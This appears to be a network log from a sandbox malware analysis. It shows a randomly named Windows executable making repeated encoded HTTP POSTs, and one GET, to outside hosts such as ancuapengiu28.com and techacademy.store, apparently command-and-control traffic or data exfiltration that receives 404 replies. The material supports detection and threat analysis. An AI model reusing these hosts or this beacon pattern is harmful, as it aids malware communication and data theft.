                                  Jul 17, 2024 18:59:57.833086014 CEST1236INData Raw: d0 bd d0 b8 d0 b7 d0 b0 d1 86 d0 b8 d1 8f d1 85 2e 3c 62 72 20 2f 3e 0d 0a 3c 62 72 20 2f 3e 0d 0a d0 92 d0 be d0 b4 d0 b8 d1 82 d1 8c 20 d1 82 d1 83 d1 80 d0 b8 d1 81 d1 82 d0 b8 d1 87 d0 b5 d1 81 d0 ba d0 b8 d0 b5 20 d0 b3 d1 80 d1 83 d0 bf d0
                                  Data Ascii: .<br /><br /> . .<br /><br />
                                  Jul 17, 2024 18:59:57.833121061 CEST1236INData Raw: d0 be d0 b3 d0 be d0 b2 d1 8b d0 b5 20 d1 80 d0 b5 d0 b7 d0 b8 d0 b4 d0 b5 d0 bd d1 82 d1 8b 20 e2 80 94 20 d0 b3 d1 80 d0 b0 d0 b6 d0 b4 d0 b0 d0 bd d0 b5 20 d0 a0 d0 be d1 81 d1 81 d0 b8 d0 b8 2c 20 d0 b4 d0 be d0 bb d0 b6 d0 bd d1 8b 20 d1 81
                                  Data Ascii: , .
                                  Jul 17, 2024 18:59:57.833153963 CEST1236INData Raw: d0 b2 d1 81 d0 b5 d0 b3 d0 be 20 d1 81 d0 b0 d0 bc d0 b0 20 d1 84 d0 be d1 80 d0 bc d0 b0 20 d0 be d1 82 d1 87 d0 b5 d1 82 d0 b0 2e 20 d0 95 d0 b5 20 d0 bc d0 be d0 b6 d0 bd d0 be 20 d1 81 d0 ba d0 b0 d1 87 d0 b0 d1 82 d1 8c 20 d0 b7 d0 b4 d0 b5
                                  Data Ascii: . . <br /><br />
                                  Jul 17, 2024 18:59:57.833188057 CEST1236INData Raw: d0 ba d1 83 d0 bf d1 8e d1 80 d1 8b 3c 62 72 20 2f 3e 0d 0a d0 a1 20 32 30 20 d0 bc d0 b0 d1 8f 20 d0 bf d0 be 20 32 20 d0 b8 d1 8e d0 bd d1 8f 20 d0 b1 d0 b0 d0 bd d0 ba d0 b8 20 d0 b1 d0 b5 d0 b7 20 d0 ba d0 be d0 bc d0 b8 d1 81 d1 81 d0 b8 d0
                                  Data Ascii: <br /> 20 2 .
                                  Jul 17, 2024 18:59:57.833224058 CEST1138INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 65 6d 61 69 6c 22 20 6e 61 6d 65 3d 22 65 6d 61 69 6c 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 d0 92 d0 b0 d1 88 20 65 6d 61 69 6c 22 3e 0a
                                  Data Ascii: <input type="email" name="email" placeholder=" email"> <input type="submit" value=""><br> <span class="gdpr-block"> <label>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.663895172.96.191.69805316C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 17, 2024 19:00:18.322715044 CEST703OUTPOST /d3vb/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.ancuapengiu28.com
                                  Origin: http://www.ancuapengiu28.com
                                  Referer: http://www.ancuapengiu28.com/d3vb/
                                  Cache-Control: no-cache
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Content-Length: 209
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                  Data Raw: 7a 6e 36 4c 3d 4e 42 6e 77 2f 54 5a 31 6c 51 42 50 73 66 61 33 72 70 61 4d 74 49 41 31 59 6e 33 6a 66 33 46 33 71 32 4e 36 2b 6f 59 49 4b 52 62 61 73 30 48 47 57 54 62 46 79 79 66 54 4c 63 44 48 55 4a 74 77 48 65 36 30 72 63 6d 70 6f 39 56 33 4b 75 36 36 58 54 34 6c 39 55 4a 4a 7a 6a 33 6c 54 75 30 57 6e 59 50 78 70 4d 61 4d 7a 35 37 47 68 4e 38 46 76 45 38 52 31 57 37 54 58 78 55 68 67 50 4c 55 51 38 39 53 44 6a 62 41 34 41 42 2f 70 57 77 32 47 46 43 36 52 59 2f 72 74 32 55 7a 7a 6c 4d 44 33 31 35 43 56 42 58 55 6a 35 39 50 73 45 6c 57 77 2f 55 39 6f 59 6f 53 4e 39 53 39 58 4d 56 43 66 6b 4c 6a 55 39 75 50 5a 71 77 66
                                  Data Ascii: zn6L=NBnw/TZ1lQBPsfa3rpaMtIA1Yn3jf3F3q2N6+oYIKRbas0HGWTbFyyfTLcDHUJtwHe60rcmpo9V3Ku66XT4l9UJJzj3lTu0WnYPxpMaMz57GhN8FvE8R1W7TXxUhgPLUQ89SDjbA4AB/pWw2GFC6RY/rt2UzzlMD315CVBXUj59PsElWw/U9oYoSN9S9XMVCfkLjU9uPZqwf
                                  Jul 17, 2024 19:00:19.258730888 CEST1033INHTTP/1.1 404 Not Found
                                  Connection: close
                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                  pragma: no-cache
                                  content-type: text/html
                                  content-length: 796
                                  date: Wed, 17 Jul 2024 17:00:19 GMT
                                  server: LiteSpeed
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.663896172.96.191.69805316C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 17, 2024 19:00:20.893569946 CEST727OUTPOST /d3vb/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.ancuapengiu28.com
                                  Origin: http://www.ancuapengiu28.com
                                  Referer: http://www.ancuapengiu28.com/d3vb/
                                  Cache-Control: no-cache
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Content-Length: 233
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                  Data Raw: 7a 6e 36 4c 3d 4e 42 6e 77 2f 54 5a 31 6c 51 42 50 74 2f 4b 33 74 4f 4f 4d 72 6f 41 32 57 48 33 6a 49 6e 46 4e 71 32 4a 36 2b 70 4d 59 4b 6a 2f 61 73 56 33 47 56 57 76 46 7a 79 66 54 41 38 44 47 61 70 74 76 48 65 48 42 72 64 61 70 6f 39 70 33 4b 75 4b 36 58 69 34 36 2f 45 4a 50 6f 7a 33 6a 58 75 30 57 6e 59 50 78 70 4e 2f 45 7a 34 54 47 6d 39 73 46 76 6c 38 51 72 47 37 51 66 52 55 68 33 66 4c 51 51 38 39 67 44 69 32 49 34 47 46 2f 70 58 41 32 43 48 71 35 65 59 2f 79 6e 57 56 68 2b 55 31 37 34 32 55 57 53 77 4f 7a 34 4a 68 75 6b 53 6b 4d 73 4d 55 65 36 49 49 51 4e 2f 4b 50 58 73 56 6f 64 6b 7a 6a 47 71 69 6f 57 65 56 38 2b 73 58 65 52 61 68 4a 45 7a 6a 45 4d 63 54 6c 30 6b 53 59 4f 51 3d 3d
                                  Data Ascii: zn6L=NBnw/TZ1lQBPt/K3tOOMroA2WH3jInFNq2J6+pMYKj/asV3GVWvFzyfTA8DGaptvHeHBrdapo9p3KuK6Xi46/EJPoz3jXu0WnYPxpN/Ez4TGm9sFvl8QrG7QfRUh3fLQQ89gDi2I4GF/pXA2CHq5eY/ynWVh+U1742UWSwOz4JhukSkMsMUe6IIQN/KPXsVodkzjGqioWeV8+sXeRahJEzjEMcTl0kSYOQ==
                                  Jul 17, 2024 19:00:21.843307018 CEST1033INHTTP/1.1 404 Not Found
                                  Connection: close
                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                  pragma: no-cache
                                  content-type: text/html
                                  content-length: 796
                                  date: Wed, 17 Jul 2024 17:00:21 GMT
                                  server: LiteSpeed
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.663897172.96.191.69805316C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 17, 2024 19:00:23.461924076 CEST1740OUTPOST /d3vb/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.ancuapengiu28.com
                                  Origin: http://www.ancuapengiu28.com
                                  Referer: http://www.ancuapengiu28.com/d3vb/
                                  Cache-Control: no-cache
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Content-Length: 1245
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                  Data Raw: 7a 6e 36 4c 3d 4e 42 6e 77 2f 54 5a 31 6c 51 42 50 74 2f 4b 33 74 4f 4f 4d 72 6f 41 32 57 48 33 6a 49 6e 46 4e 71 32 4a 36 2b 70 4d 59 4b 6a 33 61 74 6a 6a 47 57 78 7a 46 77 79 66 54 4e 63 44 44 61 70 73 7a 48 65 66 46 72 64 57 54 6f 37 74 33 4b 50 71 36 52 51 51 36 32 45 4a 50 68 54 33 6d 54 75 30 50 6e 59 66 39 70 4d 50 45 7a 34 54 47 6d 37 51 46 6d 55 38 51 73 32 37 54 58 78 55 6c 67 50 4c 34 51 38 6c 4b 44 69 44 71 34 32 6c 2f 73 48 51 32 41 54 4b 35 54 59 2f 77 67 57 55 6b 2b 56 4a 6b 34 32 49 61 53 77 72 57 34 49 5a 75 30 44 5a 67 33 50 6b 78 75 34 6f 6f 64 39 61 6f 54 62 56 57 53 6b 6a 38 43 37 79 56 50 4b 4e 6f 7a 71 54 33 46 6f 56 4d 46 78 66 72 4c 64 53 72 38 55 57 51 53 47 72 61 66 31 6b 33 30 49 54 41 37 79 54 34 52 2b 2b 49 48 2b 76 50 50 4b 52 63 34 45 69 4e 4b 42 55 4d 70 77 55 4d 6b 77 2f 44 49 58 53 36 74 2f 65 55 75 57 50 59 59 4f 78 39 7a 54 53 62 59 46 76 33 57 4a 75 55 48 50 6d 6b 4f 44 4e 4a 61 6c 33 55 54 2f 4b 69 6e 55 69 7a 7a 70 65 34 54 74 63 41 74 4d 48 67 38 35 50 68 59 [TRUNCATED]
                                  Data Ascii: zn6L=NBnw/TZ1lQBPt/K3tOOMroA2WH3jInFNq2J6+pMYKj3atjjGWxzFwyfTNcDDapszHefFrdWTo7t3KPq6RQQ62EJPhT3mTu0PnYf9pMPEz4TGm7QFmU8Qs27TXxUlgPL4Q8lKDiDq42l/sHQ2ATK5TY/wgWUk+VJk42IaSwrW4IZu0DZg3Pkxu4ood9aoTbVWSkj8C7yVPKNozqT3FoVMFxfrLdSr8UWQSGraf1k30ITA7yT4R++IH+vPPKRc4EiNKBUMpwUMkw/DIXS6t/eUuWPYYOx9zTSbYFv3WJuUHPmkODNJal3UT/KinUizzpe4TtcAtMHg85PhY7kf/BFG6zhyJnDsRYPDYCzkmioJvLdB+BUzeHgu4WDgTcbmTWNO8Z62sAT5/H+XCEVakfy/hdDjQJBq8Rp3t/ri8iESEVUpspAJRYutV9zZzao+v82LQRiKmR79gZWOWaQgck4nEm5iMKd8NYrUxhtYDz5St4zLrePi9GG3FEvt+7JbmRdIwPpYuM3/8j/E/zpJEgvhaeaees+dxR4jNcmfmsiYFCBU4N6bGqeR5tDqLl8ItSxND+d7LxldngLjmGCfPeWAFrwkRhmIXu1E9bvixMxCootrOmxxNmMY7QCNaaJNSbZ8hY31OZKET3DhRBEe0Axan5h1g9a9CRN8WraCk4Zc1DEZUleNvHxwFuKO+k4D3SHW8gByzlmIGBtHBEnUGsuHF5DxdQ5g6223FeWaV15jGP2oABcIk1UjflTESyxOelZ1ntstbriDqGRj2CHpzA8q5mBqqORobs9TTyL3IjX8WA1qndG+y9tSKMpT4wxp6vkqof7KbO6r/sMQuQoEYL3OX+RWCQZ6GmMS0emtmFSi5McsGN5dI3GeqHT1LAy1iCSSmXqZZQ0oZxptXvX6ITVkaA0b8vyia0mBuoe/qBqVl1k2mW/nSBT7cyn4hJgWLy3I1YI9Gt6GMxPEtrDXHrZLHti/5EWAfyb+n5R7LqASyhCXvoB [TRUNCATED]
                                  Jul 17, 2024 19:00:24.415227890 CEST1033INHTTP/1.1 404 Not Found
                                  Connection: close
                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                  pragma: no-cache
                                  content-type: text/html
                                  content-length: 796
                                  date: Wed, 17 Jul 2024 17:00:24 GMT
                                  server: LiteSpeed
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.663898172.96.191.69805316C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 17, 2024 19:00:26.031224012 CEST435OUTGET /d3vb/?zn6L=ADPQ8lRoxSByg+mG86XNue8ofAjmBVNA7RwbiYYLDlrQv278ITvGwT6pBJPFcJ5Oe9Xpz76I5qFPHvmWTw5Y21ldoEnhDfgwrYz6sOCTt4XHqos0nmhmqCv1SSwJ5dTjY+t3Vmc=&BF=AP6PLVoH-l HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en
                                  Host: www.ancuapengiu28.com
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                  Jul 17, 2024 19:00:26.999006033 CEST1033INHTTP/1.1 404 Not Found
                                  Connection: close
                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                  pragma: no-cache
                                  content-type: text/html
                                  content-length: 796
                                  date: Wed, 17 Jul 2024 17:00:26 GMT
                                  server: LiteSpeed
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.66389913.248.169.48805316C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 17, 2024 19:00:32.101264000 CEST703OUTPOST /cf3x/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.techacademy.store
                                  Origin: http://www.techacademy.store
                                  Referer: http://www.techacademy.store/cf3x/
                                  Cache-Control: no-cache
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Content-Length: 209
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                  Data Raw: 7a 6e 36 4c 3d 53 6a 4d 30 70 49 43 4d 46 44 62 6a 4e 32 6b 41 61 46 6c 64 55 71 49 66 4f 44 73 47 67 4a 4e 64 78 5a 76 61 47 65 51 42 55 72 64 33 74 77 4d 34 49 42 70 47 53 69 39 4d 36 66 42 63 39 31 6d 61 59 74 6e 68 61 6c 53 4e 57 70 46 70 7a 5a 43 41 4c 79 41 56 55 54 77 4b 7a 4c 34 2b 4c 63 50 78 76 69 54 47 61 75 56 71 5a 61 6f 54 58 42 4e 4f 4c 6d 62 67 6b 70 44 49 34 30 46 65 77 38 52 77 45 6a 74 4a 35 62 67 69 44 32 61 52 35 2f 6a 54 78 37 42 78 4a 77 78 42 6b 58 77 59 39 57 6e 2b 63 39 65 31 4c 64 51 72 59 66 36 58 70 4c 7a 49 39 6c 76 2b 43 53 72 70 4a 34 6d 71 65 30 59 6e 44 4c 32 48 33 70 50 6a 37 67 6d 48
                                  Data Ascii: zn6L=SjM0pICMFDbjN2kAaFldUqIfODsGgJNdxZvaGeQBUrd3twM4IBpGSi9M6fBc91maYtnhalSNWpFpzZCALyAVUTwKzL4+LcPxviTGauVqZaoTXBNOLmbgkpDI40Few8RwEjtJ5bgiD2aR5/jTx7BxJwxBkXwY9Wn+c9e1LdQrYf6XpLzI9lv+CSrpJ4mqe0YnDL2H3pPj7gmH


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.66390013.248.169.48805316C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 17, 2024 19:00:35.154923916 CEST727OUTPOST /cf3x/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.techacademy.store
                                  Origin: http://www.techacademy.store
                                  Referer: http://www.techacademy.store/cf3x/
                                  Cache-Control: no-cache
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Content-Length: 233
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                  Data Raw: 7a 6e 36 4c 3d 53 6a 4d 30 70 49 43 4d 46 44 62 6a 43 33 55 41 62 6d 39 64 42 36 49 63 4e 44 73 47 72 70 4e 52 78 5a 6a 61 47 63 38 52 55 39 4e 33 71 52 38 34 5a 7a 42 47 56 69 39 4d 78 2f 42 64 77 56 6d 46 59 74 72 54 61 6b 2b 4e 57 70 52 70 7a 5a 53 41 4b 41 6f 55 55 44 77 4d 2b 72 34 34 50 63 50 78 76 69 54 47 61 75 52 54 5a 61 77 54 58 78 64 4f 4b 48 62 6a 34 5a 44 4c 37 30 46 65 37 63 52 72 45 6a 74 52 35 65 34 49 44 30 69 52 35 2b 54 54 77 6f 5a 32 51 41 78 48 71 33 78 39 36 6b 4f 4e 45 4d 36 32 42 4f 73 58 4f 4e 4b 71 73 39 79 53 68 57 76 64 51 43 4c 72 4a 36 2b 59 65 55 59 4e 42 4c 4f 48 6c 2b 44 45 30 55 44 6b 56 4b 64 34 4b 7a 38 41 30 52 54 4e 64 76 52 72 78 43 61 74 55 51 3d 3d
                                  Data Ascii: zn6L=SjM0pICMFDbjC3UAbm9dB6IcNDsGrpNRxZjaGc8RU9N3qR84ZzBGVi9Mx/BdwVmFYtrTak+NWpRpzZSAKAoUUDwM+r44PcPxviTGauRTZawTXxdOKHbj4ZDL70Fe7cRrEjtR5e4ID0iR5+TTwoZ2QAxHq3x96kONEM62BOsXONKqs9yShWvdQCLrJ6+YeUYNBLOHl+DE0UDkVKd4Kz8A0RTNdvRrxCatUQ==


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  7192.168.2.66390113.248.169.48805316C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 17, 2024 19:00:37.730490923 CEST1740OUTPOST /cf3x/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.techacademy.store
                                  Origin: http://www.techacademy.store
                                  Referer: http://www.techacademy.store/cf3x/
                                  Cache-Control: no-cache
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Content-Length: 1245
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
